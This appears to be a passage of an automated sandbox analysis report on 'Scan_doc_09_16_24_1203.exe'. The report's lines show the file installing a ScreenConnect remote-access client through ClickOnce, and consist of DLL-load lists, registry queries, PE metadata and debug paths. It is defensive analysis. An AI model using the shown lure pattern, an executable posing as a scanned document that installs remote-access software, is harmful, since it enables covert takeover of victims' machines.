                  Source: C:\Users\user\AppData\Local\Apps\2.0\J1YPWLR7.XWH\PYK78CCC.BVG\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.ClientService.exeSection loaded: ucrtbase_clr0400.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\J1YPWLR7.XWH\PYK78CCC.BVG\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.ClientService.exeSection loaded: ucrtbase_clr0400.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\J1YPWLR7.XWH\PYK78CCC.BVG\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.ClientService.exeSection loaded: cryptsp.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\J1YPWLR7.XWH\PYK78CCC.BVG\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.ClientService.exeSection loaded: rsaenh.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\J1YPWLR7.XWH\PYK78CCC.BVG\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.ClientService.exeSection loaded: cryptbase.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\J1YPWLR7.XWH\PYK78CCC.BVG\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.ClientService.exeSection loaded: urlmon.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\J1YPWLR7.XWH\PYK78CCC.BVG\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.ClientService.exeSection loaded: iertutil.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\J1YPWLR7.XWH\PYK78CCC.BVG\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.ClientService.exeSection loaded: srvcli.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\J1YPWLR7.XWH\PYK78CCC.BVG\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.ClientService.exeSection loaded: netutils.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\J1YPWLR7.XWH\PYK78CCC.BVG\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.ClientService.exeSection loaded: sspicli.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\J1YPWLR7.XWH\PYK78CCC.BVG\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.ClientService.exeSection loaded: windows.storage.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\J1YPWLR7.XWH\PYK78CCC.BVG\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.ClientService.exeSection loaded: wldp.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\J1YPWLR7.XWH\PYK78CCC.BVG\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.ClientService.exeSection loaded: propsys.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\J1YPWLR7.XWH\PYK78CCC.BVG\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.ClientService.exeSection loaded: version.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\J1YPWLR7.XWH\PYK78CCC.BVG\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.ClientService.exeSection loaded: profapi.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\J1YPWLR7.XWH\PYK78CCC.BVG\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.ClientService.exeSection loaded: dpapi.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\J1YPWLR7.XWH\PYK78CCC.BVG\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.ClientService.exeSection loaded: wtsapi32.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\J1YPWLR7.XWH\PYK78CCC.BVG\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.ClientService.exeSection loaded: winsta.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\J1YPWLR7.XWH\PYK78CCC.BVG\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.ClientService.exeSection loaded: mswsock.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\J1YPWLR7.XWH\PYK78CCC.BVG\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.ClientService.exeSection loaded: netapi32.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\J1YPWLR7.XWH\PYK78CCC.BVG\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.ClientService.exeSection loaded: dnsapi.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\J1YPWLR7.XWH\PYK78CCC.BVG\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.ClientService.exeSection loaded: iphlpapi.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\J1YPWLR7.XWH\PYK78CCC.BVG\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.ClientService.exeSection loaded: samcli.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\J1YPWLR7.XWH\PYK78CCC.BVG\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.ClientService.exeSection loaded: samlib.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\J1YPWLR7.XWH\PYK78CCC.BVG\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.ClientService.exeSection loaded: rasadhlp.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\J1YPWLR7.XWH\PYK78CCC.BVG\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.ClientService.exeSection loaded: fwpuclnt.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\J1YPWLR7.XWH\PYK78CCC.BVG\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.ClientService.exeSection loaded: userenv.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\J1YPWLR7.XWH\PYK78CCC.BVG\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.ClientService.exeSection loaded: dhcpcsvc6.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\J1YPWLR7.XWH\PYK78CCC.BVG\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.ClientService.exeSection loaded: dhcpcsvc.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\J1YPWLR7.XWH\PYK78CCC.BVG\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.ClientService.exeSection loaded: winnsi.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\J1YPWLR7.XWH\PYK78CCC.BVG\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.WindowsClient.exeSection loaded: mscoree.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\J1YPWLR7.XWH\PYK78CCC.BVG\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.WindowsClient.exeSection loaded: kernel.appcore.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\J1YPWLR7.XWH\PYK78CCC.BVG\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.WindowsClient.exeSection loaded: version.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\J1YPWLR7.XWH\PYK78CCC.BVG\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.WindowsClient.exeSection loaded: vcruntime140_clr0400.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\J1YPWLR7.XWH\PYK78CCC.BVG\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.WindowsClient.exeSection loaded: ucrtbase_clr0400.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\J1YPWLR7.XWH\PYK78CCC.BVG\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.WindowsClient.exeSection loaded: ucrtbase_clr0400.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\J1YPWLR7.XWH\PYK78CCC.BVG\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.WindowsClient.exeSection loaded: uxtheme.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\J1YPWLR7.XWH\PYK78CCC.BVG\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.WindowsClient.exeSection loaded: cryptsp.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\J1YPWLR7.XWH\PYK78CCC.BVG\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.WindowsClient.exeSection loaded: rsaenh.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\J1YPWLR7.XWH\PYK78CCC.BVG\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.WindowsClient.exeSection loaded: cryptbase.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\J1YPWLR7.XWH\PYK78CCC.BVG\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.WindowsClient.exeSection loaded: windows.storage.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\J1YPWLR7.XWH\PYK78CCC.BVG\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.WindowsClient.exeSection loaded: wldp.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\J1YPWLR7.XWH\PYK78CCC.BVG\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.WindowsClient.exeSection loaded: profapi.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\J1YPWLR7.XWH\PYK78CCC.BVG\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.WindowsClient.exeSection loaded: amsi.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\J1YPWLR7.XWH\PYK78CCC.BVG\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.WindowsClient.exeSection loaded: userenv.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\J1YPWLR7.XWH\PYK78CCC.BVG\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.WindowsClient.exeSection loaded: urlmon.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\J1YPWLR7.XWH\PYK78CCC.BVG\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.WindowsClient.exeSection loaded: iertutil.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\J1YPWLR7.XWH\PYK78CCC.BVG\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.WindowsClient.exeSection loaded: srvcli.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\J1YPWLR7.XWH\PYK78CCC.BVG\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.WindowsClient.exeSection loaded: netutils.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\J1YPWLR7.XWH\PYK78CCC.BVG\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.WindowsClient.exeSection loaded: sspicli.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\J1YPWLR7.XWH\PYK78CCC.BVG\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.WindowsClient.exeSection loaded: propsys.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\J1YPWLR7.XWH\PYK78CCC.BVG\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.WindowsClient.exeSection loaded: windowscodecs.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\J1YPWLR7.XWH\PYK78CCC.BVG\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.WindowsClient.exeSection loaded: mscoree.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\J1YPWLR7.XWH\PYK78CCC.BVG\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.WindowsClient.exeSection loaded: kernel.appcore.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\J1YPWLR7.XWH\PYK78CCC.BVG\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.WindowsClient.exeSection loaded: version.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\J1YPWLR7.XWH\PYK78CCC.BVG\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.WindowsClient.exeSection loaded: vcruntime140_clr0400.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\J1YPWLR7.XWH\PYK78CCC.BVG\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.WindowsClient.exeSection loaded: ucrtbase_clr0400.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\J1YPWLR7.XWH\PYK78CCC.BVG\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.WindowsClient.exeSection loaded: uxtheme.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\J1YPWLR7.XWH\PYK78CCC.BVG\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.WindowsClient.exeSection loaded: cryptsp.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\J1YPWLR7.XWH\PYK78CCC.BVG\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.WindowsClient.exeSection loaded: rsaenh.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\J1YPWLR7.XWH\PYK78CCC.BVG\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.WindowsClient.exeSection loaded: cryptbase.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\J1YPWLR7.XWH\PYK78CCC.BVG\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.WindowsClient.exeSection loaded: windows.storage.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\J1YPWLR7.XWH\PYK78CCC.BVG\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.WindowsClient.exeSection loaded: wldp.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\J1YPWLR7.XWH\PYK78CCC.BVG\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.WindowsClient.exeSection loaded: profapi.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\J1YPWLR7.XWH\PYK78CCC.BVG\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.WindowsClient.exeSection loaded: amsi.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\J1YPWLR7.XWH\PYK78CCC.BVG\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.WindowsClient.exeSection loaded: userenv.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\J1YPWLR7.XWH\PYK78CCC.BVG\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.WindowsClient.exeSection loaded: urlmon.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\J1YPWLR7.XWH\PYK78CCC.BVG\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.WindowsClient.exeSection loaded: iertutil.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\J1YPWLR7.XWH\PYK78CCC.BVG\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.WindowsClient.exeSection loaded: srvcli.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\J1YPWLR7.XWH\PYK78CCC.BVG\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.WindowsClient.exeSection loaded: netutils.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\J1YPWLR7.XWH\PYK78CCC.BVG\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.WindowsClient.exeSection loaded: sspicli.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\J1YPWLR7.XWH\PYK78CCC.BVG\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.WindowsClient.exeSection loaded: propsys.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\J1YPWLR7.XWH\PYK78CCC.BVG\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.WindowsClient.exeSection loaded: ntmarta.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\J1YPWLR7.XWH\PYK78CCC.BVG\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.WindowsClient.exeSection loaded: windowscodecs.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\J1YPWLR7.XWH\PYK78CCC.BVG\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.WindowsClient.exeSection loaded: wtsapi32.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\J1YPWLR7.XWH\PYK78CCC.BVG\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.WindowsClient.exeSection loaded: winsta.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\J1YPWLR7.XWH\PYK78CCC.BVG\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.WindowsClient.exeSection loaded: wbemcomn.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\J1YPWLR7.XWH\PYK78CCC.BVG\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.WindowsClient.exeSection loaded: netapi32.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\J1YPWLR7.XWH\PYK78CCC.BVG\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.WindowsClient.exeSection loaded: wkscli.dll
                  Source: C:\Users\user\Desktop\Scan_doc_09_16_24_1203.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{00020420-0000-0000-C000-000000000046}\InprocServer32Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\SettingsJump to behavior
                  Source: Window RecorderWindow detected: More than 3 window changes detected
                  Source: C:\Users\user\AppData\Local\Apps\2.0\J1YPWLR7.XWH\PYK78CCC.BVG\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.WindowsClient.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
                  Source: Scan_doc_09_16_24_1203.exeStatic PE information: certificate valid
                  Source: Scan_doc_09_16_24_1203.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
                  Source: Scan_doc_09_16_24_1203.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
                  Source: Scan_doc_09_16_24_1203.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
                  Source: Scan_doc_09_16_24_1203.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                  Source: Scan_doc_09_16_24_1203.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
                  Source: Scan_doc_09_16_24_1203.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
                  Source: Scan_doc_09_16_24_1203.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                  Source: Scan_doc_09_16_24_1203.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                  Source: Binary string: C:\builds\cc\cwcontrol\Product\WindowsFileManager\obj\Release\ScreenConnect.WindowsFileManager.pdb source: ScreenConnect.WindowsFileManager.exe0.1.dr, ScreenConnect.WindowsFileManager.exe.1.dr
                  Source: Binary string: C:\builds\cc\cwcontrol\Product\Client\obj\Release\net20\ScreenConnect.Client.pdbU source: dfsvc.exe, 00000001.00000002.2619140064.000002618066B000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2619140064.00000261806B9000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2619140064.0000026180244000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 00000009.00000002.1966710075.000000001AD32000.00000002.00000001.01000000.00000010.sdmp, ScreenConnect.Client.dll.1.dr, ScreenConnect.Client.dll0.1.dr
                  Source: Binary string: C:\builds\cc\cwcontrol\Product\ClickOnceRunner\Release\ClickOnceRunner.pdb source: Scan_doc_09_16_24_1203.exe
                  Source: Binary string: C:\builds\cc\cwcontrol\Product\ClientService\obj\Release\ScreenConnect.ClientService.pdb source: dfsvc.exe, 00000001.00000002.2619140064.00000261806F1000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2619140064.0000026180667000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2619140064.0000026180240000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.ClientService.exe, 0000000A.00000002.1963256182.0000000003322000.00000002.00000001.01000000.0000000D.sdmp, ScreenConnect.WindowsClient.exe, 0000000C.00000002.2960868072.0000000003321000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 0000000D.00000002.2020769153.0000000002E21000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 0000000D.00000002.2020718098.0000000002DF0000.00000004.08000000.00040000.00000000.sdmp, ScreenConnect.ClientService.dll.1.dr, ScreenConnect.ClientService.dll0.1.dr
                  Source: Binary string: C:\builds\cc\cwcontrol\Product\WindowsClient\obj\Release\ScreenConnect.WindowsClient.pdbe source: ScreenConnect.WindowsClient.exe, 00000009.00000000.1953506652.0000000000102000.00000002.00000001.01000000.0000000B.sdmp, ScreenConnect.WindowsClient.exe0.1.dr, ScreenConnect.WindowsClient.exe.1.dr
                  Source: Binary string: C:\Users\jmorgan\Source\cwcontrol\Custom\DotNetRunner\Release\DotNetServiceRunner.pdb source: ScreenConnect.ClientService.exe, 0000000A.00000000.1959458553.0000000000C1D000.00000002.00000001.01000000.0000000C.sdmp, ScreenConnect.ClientService.exe0.1.dr, ScreenConnect.ClientService.exe.1.dr
                  Source: Binary string: C:\builds\cc\cwcontrol\Product\Windows\obj\Release\net20\ScreenConnect.Windows.pdb source: dfsvc.exe, 00000001.00000002.2619140064.00000261806F1000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2619140064.0000026180663000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2619140064.000002618023C000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 00000009.00000002.1966891109.000000001B352000.00000002.00000001.01000000.0000000F.sdmp, ScreenConnect.Windows.dll0.1.dr, ScreenConnect.Windows.dll.1.dr
                  Source: Binary string: C:\builds\cc\cwcontrol\Product\WindowsBackstageShell\obj\Release\ScreenConnect.WindowsBackstageShell.pdb source: ScreenConnect.WindowsBackstageShell.exe.1.dr, ScreenConnect.WindowsBackstageShell.exe0.1.dr
                  Source: Binary string: C:\builds\cc\cwcontrol\Product\WindowsClient\obj\Release\ScreenConnect.WindowsClient.pdb source: ScreenConnect.WindowsClient.exe, 00000009.00000000.1953506652.0000000000102000.00000002.00000001.01000000.0000000B.sdmp, ScreenConnect.WindowsClient.exe0.1.dr, ScreenConnect.WindowsClient.exe.1.dr
                  Source: Binary string: C:\builds\cc\cwcontrol\Product\Windows\obj\Release\net20\ScreenConnect.Windows.pdbW] source: dfsvc.exe, 00000001.00000002.2619140064.00000261806F1000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2619140064.0000026180663000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2619140064.000002618023C000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 00000009.00000002.1966891109.000000001B352000.00000002.00000001.01000000.0000000F.sdmp, ScreenConnect.Windows.dll0.1.dr, ScreenConnect.Windows.dll.1.dr
                  Source: Binary string: C:\builds\cc\cwcontrol\Product\Client\obj\Release\net20\ScreenConnect.Client.pdb source: dfsvc.exe, 00000001.00000002.2619140064.000002618066B000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2619140064.00000261806B9000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2619140064.0000026180244000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 00000009.00000002.1966710075.000000001AD32000.00000002.00000001.01000000.00000010.sdmp, ScreenConnect.Client.dll.1.dr, ScreenConnect.Client.dll0.1.dr
                  Source: Binary string: C:\builds\cc\cwcontrol\Product\Core\obj\Release\net20\ScreenConnect.Core.pdb source: dfsvc.exe, 00000001.00000002.2619140064.0000026180234000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.ClientService.exe, 0000000A.00000002.1963598655.00000000057A2000.00000002.00000001.01000000.0000000E.sdmp, ScreenConnect.Core.dll.1.dr, ScreenConnect.Core.dll0.1.dr
                  Source: Scan_doc_09_16_24_1203.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
                  Source: Scan_doc_09_16_24_1203.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
                  Source: Scan_doc_09_16_24_1203.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
                  Source: Scan_doc_09_16_24_1203.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
                  Source: Scan_doc_09_16_24_1203.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
                  Source: ScreenConnect.WindowsBackstageShell.exe.1.drStatic PE information: 0xB80EE04C [Tue Nov 8 12:57:48 2067 UTC]
                  Source: C:\Users\user\Desktop\Scan_doc_09_16_24_1203.exeCode function: 0_2_005E1000 LocalAlloc,LocalAlloc,GetModuleFileNameW,CertOpenSystemStoreA,LocalAlloc,LocalAlloc,CryptQueryObject,LocalFree,CryptMsgGetParam,CryptMsgGetParam,LocalAlloc,LocalAlloc,CryptMsgGetParam,CertCreateCertificateContext,CertAddCertificateContextToStore,CertFreeCertificateContext,LocalFree,CryptMsgGetParam,LocalFree,LocalFree,CryptMsgGetParam,CryptMsgGetParam,CertFindAttribute,CertFindAttribute,CertFindAttribute,LoadLibraryA,GetProcAddress,Sleep,CertDeleteCertificateFromStore,CertDeleteCertificateFromStore,CertCloseStore,LocalFree,LocalFree,LocalFree,0_2_005E1000
                  Source: Scan_doc_09_16_24_1203.exeStatic PE information: real checksum: 0x1bda6 should be: 0x1984e
                  Source: C:\Users\user\Desktop\Scan_doc_09_16_24_1203.exeCode function: 0_2_005E1BC0 push ecx; ret 0_2_005E1BD3
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeCode function: 1_2_00007FFD9B78D2A5 pushad ; iretd 1_2_00007FFD9B78D2A6
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeCode function: 1_2_00007FFD9B8BD2B5 push ds; iretd 1_2_00007FFD9B8BD42F
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeCode function: 1_2_00007FFD9B8A7D00 push eax; retf 1_2_00007FFD9B8A7D1D
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeCode function: 1_2_00007FFD9B8A842E pushad ; ret 1_2_00007FFD9B8A845D
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeCode function: 1_2_00007FFD9B8A00BD pushad ; iretd 1_2_00007FFD9B8A00C1
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeCode function: 1_2_00007FFD9B8AA798 push ebp; ret 1_2_00007FFD9B8D7928
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeCode function: 1_2_00007FFD9B8A845E push eax; ret 1_2_00007FFD9B8A846D
